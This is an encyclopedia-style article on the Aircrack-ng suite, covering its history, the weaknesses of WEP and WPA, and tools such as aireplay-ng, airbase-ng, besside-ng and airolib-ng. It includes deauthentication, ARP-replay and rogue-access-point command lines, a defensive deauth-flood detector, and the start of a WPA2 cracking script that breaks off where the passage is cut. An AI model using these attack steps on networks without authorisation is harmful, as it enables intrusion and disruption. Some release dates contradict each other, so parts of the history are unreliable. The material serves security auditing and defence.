Aircrack-ng
Aircrack-ng is a complete suite of command-line tools designed to assess the security of WiFi networks, with a focus on monitoring, attacking, testing, and cracking capabilities for 802.11 wireless LANs.[1] The suite enables packet capture and export for analysis, replay and deauthentication attacks through packet injection, testing of WiFi card and driver capabilities for capture and injection, and recovery of WEP keys using methods like PTW (introduced in 2007) or FMS/KoreK, as well as WPA/WPA2-PSK keys via dictionary attacks on captured handshakes.[1][2][3] It supports optimizations such as SSE2, AVX, AVX2, and AVX512 for accelerated processing, and is compatible with platforms including Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, Solaris, and eComStation 2.[2][3] Originating as an evolution of the earlier Aircrack project, Aircrack-ng was developed starting around 2005 by Christophe Devine and a community of contributors, with key advancements like the PTW method enhancing WEP cracking efficiency by extending RC4 statistical analysis.[2] The project has seen active open-source development on GitHub, amassing over 4,000 commits by its 1.7 release in May 2022 (as of November 2025, the latest stable version), which added support for Wi-Fi 6E, WPA3/OWE detection, and Apple M1 compatibility.[4][5] Recognized by authoritative bodies like the Cybersecurity and Infrastructure Security Agency (CISA) for evaluating wireless password strength, Aircrack-ng emphasizes ethical use in security auditing while warning against unauthorized access.[6]
Development and History
Origins and Fork
The original Aircrack tool was developed by French security researcher Christophe Devine and first published in July 2003.[7] It primarily focused on recovering Wired Equivalent Privacy (WEP) keys from captured wireless packets using statistical attacks, such as the Fluhrer-Mantin-Shamir (FMS) method, which exploited weaknesses in the RC4 stream cipher initialization.[7] This tool emerged amid growing awareness of Wi-Fi vulnerabilities following the 2001 publication of the FMS attack paper, enabling practical demonstrations of WEP's insecurity for educational and auditing purposes.

By 2005, the original Aircrack had reached version 2.41 but exhibited limitations, including poor code modularity, lack of support for emerging protocols like WPA, and restricted platform compatibility primarily to Linux.[7] In response, Thomas d'Otreppe de Bouvette initiated a fork in February 2006, creating Aircrack-ng (Aircrack Next Generation) to address these issues through improved maintainability, modular design, addition of new features such as WPA-PSK cracking, and broader multi-platform support including Windows and BSD variants.[8] The fork aimed to evolve the suite into a more comprehensive, community-driven toolkit for wireless security assessment while preserving the core WEP cracking capabilities.[9]

Early development of Aircrack-ng was led by d'Otreppe, with significant contributions from David Adams and a growing community of developers collaborating via SourceForge hosting.[10] This open-source effort transitioned under the GNU General Public License (GPL) version 2, facilitating ongoing enhancements and distribution across hacking distributions like Kali Linux. In 2018, the project migrated to GitHub, further enabling collaborative governance and integration of optimizations like the KoreK and PTW attacks for faster key recovery.[3]
Version History
Aircrack-ng's development began with its initial release as version 0.9 on May 13, 2007, following the project's fork from the original Aircrack in February 2006. This version introduced a modular structure for the suite of tools, along with basic support for WPA cracking and enhancements such as the PTW attack for WEP key recovery, injection testing in aireplay-ng, and decryption of IEEE 802.11e headers via airdecap-ng. Early versions like 0.9 also supported foundational attacks such as the Fluhrer-Mantin-Shamir (FMS) method for exploiting WEP vulnerabilities.[11]

Subsequent milestone releases built on this foundation with performance improvements and expanded compatibility. Version 1.0, released on September 7, 2009, improved airserv-ng compatibility across 32/64-bit OSes, added support for PPI (Per-Packet Information) capture formats, and fixed issues in WPA handshake detection and cross-platform compatibility, including FreeBSD.[11][12] Version 1.1, released on April 24, 2010, introduced airdrop-ng for remote packet dropping and addressed buffer overflows in several tools, enhancing overall stability for WPA cracking workflows.[11] Later versions focused on speed optimizations and modern hardware support.
Version 1.2, released on April 15, 2018, significantly improved WPA cracking speeds (up to 3x faster in some cases) through better CPU utilization, added support for 802.11n/ac in airodump-ng, and included an autotools-based build system for easier compilation across platforms.[11] Version 1.4, released on September 29, 2018, enhanced packet capture handling with AVL trees for efficient processing of large files, introduced PMKID clientless cracking, and integrated hwloc for optimized performance on multi-core systems, alongside initial WPA3 compatibility.[11][13]

The latest stable release, version 1.7 on May 10, 2022, incorporated over 400 commits addressing bug fixes, code refactoring, and optimizations for modern hardware, including better error handling in airmon-ng for Raspberry Pi and newer chipsets, Python 3 support for scripting tools, and improved static analysis for security.[11][4] As of November 2025, no major releases have followed 1.7, with development emphasizing ongoing maintenance through minor patches on GitHub for compatibility with updated systems, such as the Fedora 1.7-9 rebuild in January 2025.[14][3]

Development practices shifted in the 2010s, notably with the full migration from SourceForge to GitHub on March 11, 2018, to facilitate better collaboration, issue tracking, and continuous integration. The project has since prioritized security auditing features over introducing new exploits, aligning with its role in Wi-Fi penetration testing.[3]
Wi-Fi Security Protocols and Vulnerabilities
WEP
Wired Equivalent Privacy (WEP) was standardized in 1997 as part of the original IEEE 802.11 standard to provide basic confidentiality for wireless local area networks, equivalent to that of a wired network. It employs the RC4 stream cipher for encryption, using a shared secret key of either 40 bits or 104 bits, concatenated with a 24-bit initialization vector (IV) to generate a per-packet keystream. The protocol appends a CRC-32 checksum as an integrity check vector (ICV) to each packet before encryption, aiming to protect against eavesdropping and unauthorized access. However, WEP's design was rushed and lacked robust cryptographic review, leading to fundamental flaws that rendered it insecure from the outset.[15][16]

Key weaknesses in WEP include the use of a short, static IV that is sent in plaintext, enabling rapid exhaustion of the 24-bit IV space (approximately 16 million possible values) and key reuse across packets, which exposes the keystream to XOR-based attacks. The CRC-32 integrity mechanism is a non-cryptographic checksum vulnerable to bit-flipping attacks, where an adversary can alter ciphertext bits and recompute the ICV without knowledge of the key, allowing packet modification. Additionally, WEP provides no replay protection, permitting attackers to resend captured packets indefinitely without detection. These issues, combined with RC4's key scheduling vulnerabilities, facilitate both passive and active exploitation.[17][18]

Major attacks exploiting these flaws began with the Fluhrer-Mantin-Shamir (FMS) attack in 2001, which recovers the key by collecting weak IVs that bias RC4's initial keystream output, typically requiring around 5 million IVs for a 40-bit key. In 2004, KoreK's statistical attacks improved on FMS by leveraging additional IV correlations, reducing the required IVs to approximately 500,000 for reliable key recovery.
The same year, KoreK's Chopchop attack enabled byte-by-byte decryption of a single packet by iteratively truncating it, guessing the last byte, and verifying via ICV, exploiting RC4's malleability and the weak integrity check—one byte per successfully injected packet. By 2007, the Pyshkin-Tews-Weinmann (PTW) attack further optimized key recovery, succeeding with about 85,000 IVs at 95% probability, independent of weak IV reliance.[19][20][21]

The Wi-Fi Alliance declared WEP insecure in 2004 due to these vulnerabilities, recommending immediate transition to WPA. By 2006, with WPA2 certification becoming mandatory, WEP was fully deprecated in IEEE 802.11 standards, prohibiting its use in new Wi-Fi certified devices. Despite this, legacy hardware may still support WEP, perpetuating risks. Aircrack-ng tools target WEP by capturing IVs and applying these statistical methods or dictionary attacks on weak keys, demonstrating the protocol's practical breakability in educational and testing contexts.[22][23]
WPA and WPA2
Wi-Fi Protected Access (WPA) was introduced in 2003 by the Wi-Fi Alliance as an interim enhancement to address the severe vulnerabilities in the Wired Equivalent Privacy (WEP) protocol. It employs the Temporal Key Integrity Protocol (TKIP), which builds on the RC4 stream cipher used in WEP but incorporates per-packet key mixing and a 48-bit initialization vector to prevent key reuse and improve resistance to certain attacks. WPA supports Pre-Shared Key (PSK) mode, allowing straightforward deployment in home and small office environments without requiring enterprise authentication infrastructure.[24]

WPA2, formally ratified in 2004 as part of the IEEE 802.11i standard, became mandatory for all Wi-Fi Alliance certified devices starting March 13, 2006. It introduces the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), which uses the Advanced Encryption Standard (AES) in CCM mode for robust confidentiality, integrity, and authentication, effectively replacing TKIP as the preferred encryption method while maintaining backward compatibility with legacy devices. This shift to AES-CCMP provided significantly stronger cryptographic protections compared to TKIP's RC4-based approach.[24]

Despite these advancements, both protocols retain exploitable weaknesses relevant to tools like Aircrack-ng.
In WPA with TKIP, the Beck-Tews attack, disclosed in 2008, exploits weaknesses in the protocol's Michael message integrity check and key derivation to decrypt broadcast packets such as ARP requests and inject forged packets, potentially enabling further network reconnaissance or disruption without full key recovery.[25] For WPA2, the Key Reinstallation Attack (KRACK), revealed in 2017, targets flaws in the 4-way handshake process by forcing nonce reuse through manipulated packet retransmissions, allowing attackers to replay encrypted frames, decrypt select traffic like HTTPS content, and potentially hijack sessions.[26] Both protocols in PSK mode are also susceptible to offline dictionary or brute-force attacks on weak passphrases, which require capturing the authentication handshake to test candidate keys computationally.[27]

WPA3, announced by the Wi-Fi Alliance in June 2018, advances security further by mandating Simultaneous Authentication of Equals (SAE) for PSK authentication, which resists offline dictionary attacks through a dragonfly key exchange that protects even weak passwords. However, Aircrack-ng's capabilities remain centered on exploiting WPA and WPA2-PSK vulnerabilities via handshake capture and cracking, with no native support for WPA3's enhanced mechanisms.
Timeline of Cracking Attacks
The timeline of cracking attacks on Wi-Fi security protocols highlights key vulnerabilities exploited by researchers, with Aircrack-ng playing a pivotal role in implementing and refining these techniques for auditing purposes. In 2001, the Fluhrer, Mantin, and Shamir (FMS) attack was published, revealing weaknesses in the RC4 key scheduling algorithm used in WEP, allowing key recovery through the collection of weak initialization vectors (IVs) from broadcast packets.[28] This statistical attack laid the foundation for practical WEP cracking tools, and Aircrack-ng incorporated an implementation of FMS from its early versions to enable passive key recovery with sufficient captured traffic.

By 2004, refinements to WEP cracking emerged alongside the introduction of WPA. The KoreK attacks, developed by an anonymous researcher known as KoreK, optimized the FMS method by identifying additional weak IV classes, significantly reducing the number of packets needed for key recovery to around 500,000–1,000,000.[29] Concurrently, the Chopchop attack, detailed on security forums, enabled interactive decryption of WEP packets byte-by-byte without the full key, exploiting the protocol's CRC-32 checksum vulnerability.[30] That same year, the Wi-Fi Alliance introduced WPA with TKIP to mitigate WEP flaws, but early analyses revealed TKIP's Michael MIC weaknesses, paving the way for future exploits. Aircrack-ng integrated both KoreK optimizations and Chopchop support in subsequent releases, enhancing its efficiency for WEP audits.

In 2007, the PTW attack further accelerated WEP key recovery, requiring as few as 40,000 packets for a 104-bit key with 50% success probability, by improving statistical biases in RC4 keystreams and incorporating ARP replay techniques.[31] Developed by Erik Tews, Ralf-Philipp Weinmann, and Andrey Pyshkin, PTW addressed limitations in prior methods under noisy conditions.
Aircrack-ng version 1.0, released that year, adopted PTW as its default WEP cracking algorithm, marking a major update in performance.

The first practical attacks on WPA via TKIP vulnerabilities appeared in 2008, extending WEP techniques like Chopchop to decrypt packets and forge traffic, though limited by TKIP countermeasures such as extended IVs and MIC extensions.[25] Researchers Erik Tews and Martin Beck demonstrated these in a whitepaper, enabling partial session hijacking but not full key recovery without additional flaws. Aircrack-ng updated its suite to support TKIP-specific replay and fragmentation attacks, aligning with these discoveries for testing WPA deployments.

A significant WPA2 vulnerability emerged in 2017 with the disclosure of the Key Reinstallation Attack (KRACK), which exploited flaws in the 4-way handshake to reinstall encryption keys, allowing nonce reuse and decryption of traffic or injection of malicious packets.[32] Discovered by Mathy Vanhoef, KRACK affected nearly all WPA2 devices but did not compromise the pairwise master key itself, prompting widespread patches. While Aircrack-ng did not directly implement KRACK due to its active nature requiring client-side manipulation, the suite's packet injection tools like aireplay-ng facilitated demonstrations and defenses against such reinstallation risks.

Into the 2020s, cracking efforts shifted toward offline dictionary and brute-force attacks on WPA2-PSK, leveraging captured handshakes without new protocol-level exploits by 2025, as WPA3 adoption grew.
Optimizations focused on GPU acceleration, with tools processing billions of password guesses per second using frameworks like Hashcat, emphasizing the importance of strong passphrases over inherent protocol weaknesses.[33] Aircrack-ng continued evolving with dictionary support for WPA/WPA2 handshakes and integrations for GPU offloading via external libraries, maintaining its relevance for security assessments amid these computational advances.
Core Tools
aircrack-ng
Aircrack-ng is the flagship tool in the Aircrack-ng suite, designed primarily for recovering WEP encryption keys through statistical attacks such as FMS, KoreK, and PTW, as well as cracking WPA/WPA2 pre-shared key (PSK) passphrases using dictionary or brute-force methods on captured authentication handshakes.[2] It processes offline packet captures to exploit weaknesses in the RC4 stream cipher used by WEP and the PBKDF2 key derivation in WPA/WPA2-PSK, enabling key extraction without real-time network interaction.[2][30]

The tool requires input in the form of .cap files containing sufficient captured packets, typically generated by airodump-ng; for WEP cracking, this includes a minimum number of initialization vectors (IVs) paired with encrypted data packets, while WPA/WPA2 cracking needs at least the four-way handshake (such as EAPOL messages 2/3 or 3/4).[2]

The FMS algorithm identifies weak IVs that allow setting up a system of linear equations over GF(2) to solve for the key bytes, exploiting predictable RC4 states from specific IV sequences.[30] KoreK builds on this by applying statistical correlations derived from empirical analysis of RC4 biases, resembling a neural network approach to refine key candidates and accelerate recovery.[30] The PTW method enhances efficiency by leveraging bitwise correlations in RC4 keystream bytes conditioned on known plaintext like ARP packets, reducing the required packet count for high success probability.[34] For WPA/WPA2-PSK, aircrack-ng tests candidate passphrases by computing the pairwise master key (PMK) via PBKDF2-HMAC-SHA1 iterations using the network SSID and passphrase, deriving the pairwise transient key (PTK), and verifying the message integrity code (MIC) against the captured handshake.[2]

Upon successful cracking, aircrack-ng outputs the recovered WEP key in hexadecimal format (e.g., for 40/104-bit keys) or the WPA/WPA2 passphrase in ASCII, along with derived keying material if applicable.[2] For example, the PTW method achieves approximately 50% success probability with around 40,000 IVs for 104-bit keys, requiring about 85,000 IVs for 95% success; fewer IVs suffice for 64-bit keys.[2][34] WPA/WPA2 success depends heavily on the passphrase strength and dictionary quality, with no guaranteed recovery for complex keys. Limitations include high computational demands, particularly for exhaustive WPA/WPA2 searches on modern hardware, and lack of support for WPA3, which employs simultaneous authentication of equals (SAE) instead of PSK handshakes.[2]
aireplay-ng
Aireplay-ng is a command-line tool within the Aircrack-ng suite designed for injecting and replaying wireless frames to facilitate the assessment of Wi-Fi network security.[35] It primarily generates artificial traffic to accelerate the capture of data needed for cracking encryption keys, such as WEP initialization vectors (IVs) or WPA handshakes, by exploiting vulnerabilities in 802.11 protocols.[35] The tool operates in monitor mode on compatible wireless interfaces, allowing it to forge and transmit packets without association to the target network.[35]

The core functions of aireplay-ng include packet injection for forging authentication frames and replaying captured packets to amplify network traffic.[35] It supports deauthentication and disassociation attacks, which send forged management frames to disconnect clients from an access point, forcing reconnections that reveal WPA/WPA2 handshakes for offline cracking.[35] For WEP networks, aireplay-ng enables ARP replay attacks by capturing and reinjecting ARP request packets, which generates a high volume of encrypted traffic containing unique IVs essential for key recovery.[35] Additionally, it performs chopchop attacks, which decrypt WEP packets byte-by-byte through repeated injection and analysis, though this method is slower and requires no prior knowledge of IP addresses.[35]

Usage of aireplay-ng requires a wireless interface in monitor mode, typically enabled via airmon-ng, to transmit frames effectively.[35] Common command options include -0 or --deauth for deauthentication floods (e.g., aireplay-ng -0 5 -a <BSSID> -c <client MAC> mon0 to send five deauth packets), and -3 or --arpreplay for ARP-based traffic amplification (e.g., aireplay-ng -3 -b <BSSID> -h <client MAC> mon0 using a captured ARP packet).[35] Other parameters control injection rate with -x (packets per second) and target specifics like BSSID (-b) or client MAC (-c), ensuring precise attacks while minimizing detection.[35] Interactive packet selection is available in -2 mode for manual replay, and -9 tests injection capability before full attacks.[35]
Aireplay-ng significantly accelerates WEP cracking by increasing the rate of IV collection through active injection, reducing the time from hours of passive sniffing to minutes of targeted replay.[35] For WPA/WPA2, its deauthentication capability is essential to capture the four-way handshake required for dictionary or brute-force attacks in aircrack-ng.[35] Effectiveness depends on the wireless card's injection rate, which can be optimized by setting higher transmission rates (e.g., via iwconfig).[35]
Hardware compatibility is crucial, as aireplay-ng requires cards supporting raw packet injection and monitor mode.[36] Atheros chipsets, such as the AR9271 found in USB adapters like the ALFA AWUS036NHA, provide reliable performance with kernel/mac80211 drivers, enabling high injection rates up to 500 packets per second.[36] Other supported examples include Ralink RT3070 and certain Qualcomm Atheros variants, though success varies by driver version and firmware.[36]
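The deauthentication floods described above are also what a wireless intrusion detection system looks for. As an added example that is not Aircrack-ng project code, the following Python models that detection over captured management frames: a sliding-window count of deauthentication and disassociation frames per BSSID, with a flag when they go to the broadcast address. The frame records, MAC addresses, window length and threshold are all constructed assumptions.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

# 802.11 management-frame subtypes (frame control field).
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class MgmtFrame:
    ts: float      # capture timestamp in seconds
    subtype: int   # management subtype
    bssid: str     # Address 3: the AP the frame claims to come from
    dst: str       # Address 1: receiver address


def detect_deauth_floods(frames, window_s: float = 1.0, threshold: int = 5):
    """Flag each BSSID that emits more than `threshold` deauth/disassoc frames
    within any `window_s` sliding window.

    A legitimate AP sends a handful of these per second at most; a forged
    flood arrives in bursts, and when no client is singled out the frames go
    to the broadcast address, so that is reported separately.
    """
    recent = defaultdict(deque)   # bssid -> frames currently inside the window
    alerts = []
    already_flagged = set()
    for frame in sorted(frames, key=lambda f: f.ts):
        if frame.subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        window = recent[frame.bssid]
        window.append(frame)
        # Drop frames that fell out of the window; the frame just appended keeps it non-empty.
        while frame.ts - window[0].ts > window_s:
            window.popleft()
        if len(window) > threshold and frame.bssid not in already_flagged:
            already_flagged.add(frame.bssid)
            alerts.append({
                "bssid": frame.bssid,
                "count": len(window),
                "first_ts": window[0].ts,
                "last_ts": frame.ts,
                "broadcast": any(f.dst == BROADCAST for f in window),
                "targets": sorted({f.dst for f in window}),
            })
    return alerts


# Constructed sample capture: one legitimate disassociation, one beacon (ignored),
# and a burst of twelve broadcast deauthentication frames from one BSSID in ~0.22 s.
SAMPLE_FRAMES = [
    MgmtFrame(0.50, SUBTYPE_DISASSOC, "02:00:00:00:bb:02", "02:00:00:00:cc:03"),
    MgmtFrame(0.60, SUBTYPE_BEACON, "02:00:00:00:aa:01", BROADCAST),
] + [
    MgmtFrame(1.00 + 0.02 * i, SUBTYPE_DEAUTH, "02:00:00:00:aa:01", BROADCAST)
    for i in range(12)
]

if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        kind = "broadcast" if alert["broadcast"] else "targeted"
        span = alert["last_ts"] - alert["first_ts"]
        print(f"{kind} deauth flood from {alert['bssid']}: "
              f"{alert['count']} frames in {span:.2f}s toward {alert['targets']}")
```

Networks with 802.11w Protected Management Frames enabled make clients discard unauthenticated deauthentication frames, which removes the disconnect effect but not the radio traffic, so this kind of monitoring still sees the attempt.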
airodump-ng
Airodump-ng is a packet sniffer and analyzer within the Aircrack-ng suite, designed for passive monitoring and capture of Wi-Fi traffic to support network reconnaissance. It operates by capturing raw 802.11 frames, including beacons, data packets, and management frames such as probe responses and association requests, while monitoring 2.4 GHz channels by default with automatic hopping to scan multiple frequencies. The tool displays real-time information on access points (APs) and clients, including ESSIDs, BSSIDs, signal strength (PWR), receive quality (RXQ), number of beacons and data packets, channel, and connected clients' MAC addresses, power levels, probe requests, and packet loss rates.[37] It also detects encryption types, such as WEP, WPA, WPA2, or WPA3, along with ciphers (e.g., TKIP, CCMP) and authentication methods (e.g., PSK).[37]

The captured data is saved in multiple formats for further analysis, with pcap-compatible .cap files providing full packet captures suitable for tools like Wireshark. Other outputs include .csv files detailing AP and client information, .kismet.csv for compatibility with Kismet wireless intrusion detection systems, and .ivs files exporting only initialization vectors (IVs) for WEP analysis. Additional formats encompass .gps for location data and .kismet.netxml for network topology exports. These files enable offline examination of network structures and traffic patterns.[37]

Key command-line options allow customization of airodump-ng's behavior, such as --channel (or -c) to fix monitoring on specific channels (e.g., -c 1,6,11) or enable hopping intervals via -f <msecs>, --bssid to filter captures to a single AP's MAC address (e.g., --bssid 00:14:6C:7A:41:20), and --write (or -w) to specify a prefix for output files (e.g., -w capture). The --ivs option streamlines WEP IV collection by saving only relevant data, reducing file sizes for targeted analysis.[37]
Enhancements include GPS integration through --gpsd, which logs coordinates from a GPS receiver into .gps files for mapping network locations, and automatic detection of WPA handshakes in real-time console output (e.g., alerting "WPA handshake: <BSSID>"). Captured .cap or .ivs files from airodump-ng can subsequently be processed by aircrack-ng for key cracking.[37]
Attack and Automation Tools
airbase-ng
airbase-ng is a versatile tool within the Aircrack-ng suite designed to create rogue access points (APs) that simulate legitimate Wi-Fi networks, thereby luring client devices to associate with them for the purpose of conducting targeted attacks on those clients rather than the AP itself.[38] By emulating various network configurations, including open authentication, WEP-encrypted networks, and WPA/WPA2 setups, airbase-ng enables the generation of deceptive beacons and probe responses to attract clients, even those configured for hidden SSIDs via the -X option.[38] This client-focused approach facilitates the capture of authentication materials and traffic without directly targeting an existing AP, distinguishing it from tools that inject packets into live networks.[38]
The tool supports several specific attacks that exploit client vulnerabilities to recover encryption keys or authentication data. For WEP networks, airbase-ng implements the Caffe Latte attack using the -L option, which leverages gratuitous ARP requests from associating clients to generate sufficient initialization vectors (IVs) for key recovery, even without access to the original AP.[38] Similarly, the Hirte attack, enabled by the -N option, extends this by amplifying weak IVs through fragmentation of any captured ARP or IP packets from the client, allowing key extraction in scenarios where the AP is unavailable.[38] For WPA/WPA2, airbase-ng can force client associations to capture the four-way handshake by configuring appropriate tags (e.g., -z 2 for WPA-TKIP or -Z 4 for WPA2-CCMP), generating the necessary traffic to prompt re-authentication.[38]
Key command-line options allow precise control over the rogue AP's behavior, such as -e <ESSID> to set the network name, -c <channel> to specify the operating channel, -w <WEP key> for encryption in WEP mode, and -a <BSSID> to define the fake AP's MAC address.[38] Additional parameters like -s enforce shared key authentication for WEP, while -P enables responses to all probe requests to increase client attraction, and -x <nbpps> sets the packet transmission rate (default 100 packets per second) to simulate active traffic.[38] Usage typically involves running airbase-ng <options> <monitor interface>, such as airbase-ng -c 9 -e "teddy" -W 1 mon0, which creates a WEP-enabled rogue AP on channel 9 named "teddy".[38]
Output from airbase-ng includes real-time console displays of client associations, probe requests, and encryption details, alongside the creation of a tap interface (e.g., at0) for handling decrypted or routed packets.[38] Captured frames, including handshakes and attack-generated traffic, can be saved to .cap files using the -F <prefix> option for subsequent analysis or cracking with other Aircrack-ng tools.[38]
Advanced features extend airbase-ng's utility for complex scenarios, including support for multiple APs via --bssids <file> to load a list of BSSIDs for simultaneous emulation, and beacon flooding for denial-of-service (DoS) effects by overwhelming clients with fake network advertisements using options like -P combined with -C <seconds> to probe and beacon multiple ESSIDs.[38] It also supports ad-hoc mode (-A) for peer-to-peer simulations and external packet processing (-Y) to integrate with custom scripts or tools for enhanced traffic manipulation.[38]
airmon-ng
airmon-ng is a command-line utility within the Aircrack-ng suite designed to manage wireless network interfaces, primarily by enabling and disabling monitor mode to facilitate wireless security auditing.[39] It also handles the detection of interfering processes and provides diagnostic information about supported chipsets and drivers.[39] Without arguments, running airmon-ng displays the current status of wireless interfaces, including their mode, chipset details, and driver information.[39]
The core function of airmon-ng is to start or stop monitor mode on a specified wireless interface, which allows the interface to passively capture all wireless traffic without associating with a network.[39] For instance, executing airmon-ng start wlan0 creates a new virtual monitor interface named wlan0mon (or mon0 in some configurations), enabling raw 802.11 frame capture.[39] It automatically checks for and warns about processes that may interfere with monitor mode, such as NetworkManager or dhclient, which can disrupt packet injection or capture.[39] To mitigate these, airmon-ng can kill such processes upon request.[39] Additionally, it detects common wireless chipsets, including Atheros (e.g., AR9271 with ath9k driver) and Ralink (e.g., RT3070 with rt2800usb driver), ensuring compatibility before mode switching.[39]
Key commands include airmon-ng start <interface> [channel] to initiate monitor mode on the specified channel, airmon-ng stop <interface> to revert to managed mode and remove the monitor interface, and airmon-ng restart <interface> for a full cycle of stopping and restarting.[39] The airmon-ng check command lists potentially problematic processes like wpa_supplicant, while airmon-ng check kill terminates them automatically to prevent conflicts.[39] For debugging, options such as --verbose or --debug provide detailed output on interface operations and errors.[39]
airmon-ng requires root privileges to modify kernel-level interface settings and relies on compatible wireless drivers that support monitor mode, such as ath9k for Atheros chipsets or rtl8187 for Realtek devices.[39] Without these, attempts to enable monitor mode will fail, often indicated by error messages in the output.[39]
In troubleshooting scenarios, airmon-ng addresses common issues by automatically killing interfering daemons like wpa_supplicant during mode activation.[39] It also supports the creation and deletion of virtual interfaces; lingering monitor interfaces can be removed manually using iw dev <interface> del if needed.[39] For driver-related problems, reloading modules (e.g., rmmod ath9k; modprobe ath9k) may resolve detection failures.[39]
As a foundational tool in the Aircrack-ng suite, airmon-ng serves as a prerequisite for all packet capture and injection operations, preparing interfaces for use by subsequent tools in wireless assessments.[39]
besside-ng
Besside-ng is an automated tool within the Aircrack-ng suite designed to crack WEP-encrypted wireless networks and capture WPA/WPA2 handshakes without requiring manual intervention from the user. Developed by Andrea Bittau, it builds on concepts from earlier tools like Wesside-ng but extends support to WPA encryption, enabling it to target both legacy and modern Wi-Fi security protocols in range. It is an experimental tool that requires enabling experimental features during compilation (e.g., using the --with-experimental flag).[40][3] It requires a compatible wireless interface capable of packet injection.[40]
The workflow of besside-ng begins with scanning for nearby access points (APs) using the specified wireless interface in monitor mode. Upon detecting a WEP network, it automatically associates with the AP, injects packets to generate initialization vectors (IVs), and accumulates sufficient data for on-the-fly cracking using integrated aircrack-ng algorithms. For WPA/WPA2 networks, it monitors for clients, performs deauthentication attacks to force handshake exchanges, and logs the resulting 4-way handshakes. The tool handles association, injection, and capture seamlessly, directing output to log files and packet captures while continuing to scan other networks in parallel. This automation reduces the need for separate commands, making it suitable for penetration testing in dynamic environments.[40] It internally leverages aireplay-ng for packet injection and deauthentication tasks.[40]
Besside-ng operates in two primary modes: full automatic mode, which targets both WEP and WPA networks by default, and WPA-only mode activated via the -W option to focus exclusively on handshake capture without attempting WEP cracks. In WPA mode, it can optionally upload captured handshakes to a remote server like wpa.darkircop.org for dictionary-based cracking and feasibility analysis, providing statistics on passphrase strength. These modes allow users to tailor the tool for specific security assessments, such as rapid WEP exploitation or offline WPA analysis preparation.[40]
Key command-line options include:
-b <target mac>: target a single AP by BSSID.
-s <WPA server>: upload server for captured WPA handshakes (default: wpa.darkircop.org).
-c <chan>: lock scanning to one channel, useful when the target network is known.
-p <pps>: packets-per-second injection rate, trading speed against detectability.
-W: WPA-only mode (no WEP attacks).
-v: verbose output.
-h: help screen.
The invocation is besside-ng [options] <interface>, where the interface must already be in monitor mode (for example via airmon-ng).[40]
Output from besside-ng includes a primary log file, besside.log, which records for each cracked network the SSID, the recovered WEP key in hexadecimal and ASCII, the BSSID, the channel and the encryption type. Captured WPA handshakes are written to a capture file (wpa.cap) for later processing with aircrack-ng or other crackers and wordlists. With good signal and enough client traffic a WEP key can fall within minutes; the PTW attack typically needs on the order of 20,000 IVs for a 40-bit key and 40,000 or more for a 104-bit key. WPA handshakes are stored for offline use; when uploaded, the server returns the result of its own cracking attempt.[40]
Limitations of besside-ng include its dependence on hardware with reliable packet injection, such as certain Atheros or Ralink chipsets; on unsupported devices association or injection fails and captures stay incomplete. Against WPA2 networks the tool only captures the handshake: recovering the pre-shared key is an offline dictionary attack, so a long random passphrase (for example 12 or more characters mixing cases and symbols) is not recoverable with any realistic wordlist, GPU acceleration or not, and such cracking lies outside the tool's scope. It is less effective in low-traffic environments where few clients associate, and the optional upload service hands the handshake to a third party and may be unavailable.[40]
Supporting Utilities
airolib-ng
Airolib-ng is a utility in the Aircrack-ng suite that precomputes and manages Pairwise Master Keys (PMKs) to speed up WPA/WPA2-PSK dictionary attacks on captured handshakes.[41] It stores lists of network names (ESSIDs) and candidate passphrases in a database and derives the PMK for every ESSID-passphrase pair, so that during cracking each candidate can be checked against the handshake without recomputing the expensive key derivation.[42] This removes the main computational bottleneck of WPA/WPA2 cracking, since PMK derivation dominates the cost of testing each candidate.[43] The workflow begins by importing ESSID and passphrase lists into the database, for example airolib-ng <database> --import passwd <wordlist_file> for passphrases and airolib-ng <database> --import essid <essid_file> for network names.[42] The PMKs are then computed with --batch, which runs PBKDF2-HMAC-SHA1 with 4096 iterations over each pair, as specified for WPA/WPA2-PSK, to produce a 256-bit key.[41] Stored PMKs can be checked with --verify; with the all argument every PMK is recomputed and invalid entries are deleted.[42] Other operations include --clean (with all, the database file is also compacted) to reduce its size, --export cowpatty <essid> <file> to produce coWPAtty tables, and --stats to print database statistics.[42]
For storage, airolib-ng uses an SQLite3 database (version 3.3.17 or later), which handles large sets of ESSID-passphrase pairs and their PMKs with little overhead across platforms.[41] The ESSID is the salt of the PBKDF2 derivation, so a PMK is only valid for the ESSID it was computed with; the database keeps per-ESSID tables, and precomputation pays off mainly against default or very common network names or for repeated assessments of the same network.[43] PMKs can also be computed on several systems and merged into one database.[41]
By precomputing the PMKs, airolib-ng moves the PBKDF2 cost out of the attack: against a captured handshake, aircrack-ng can then test on the order of 50,000 passphrases per second, since each test is only a PTK derivation and MIC comparison, turning hours of work into seconds for passphrases present in the table.[41] The database is used by passing its path to aircrack-ng with the -r option, as in aircrack-ng -r <database> <capture_file>.[42] The result is often called a rainbow table, but it is a plain lookup table of (ESSID, passphrase, PMK) rows rather than a chain-reduced rainbow table, and the PBKDF2 work still has to be paid once per ESSID when the table is built.
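To make the division of labour concrete, the following Python example (written for this page; it is not code from aircrack-ng or airolib-ng) implements both halves of the attack: the PBKDF2-HMAC-SHA1 PMK derivation that airolib-ng --batch stores, and the per-handshake PTK derivation and EAPOL MIC check that aircrack-ng performs against each stored PMK. The handshake, MAC addresses, nonces, ESSID "linksys" and RSN information element are constructed in the code rather than captured; the PMK test vector for ESSID "IEEE" and passphrase "password" is the one published in the IEEE 802.11i standard.

```python
"""Added example (not aircrack-ng or airolib-ng code): the two halves of a
WPA2-PSK dictionary attack.  PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32)
is the expensive, ESSID-bound step that airolib-ng precomputes; deriving the PTK
and checking the EAPOL MIC is the cheap per-handshake step aircrack-ng runs.
The handshake below is constructed, not captured."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of key descriptor precede the MIC field


def pmk(essid: str, passphrase: str) -> bytes:
    # IEEE 802.11i: PSK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


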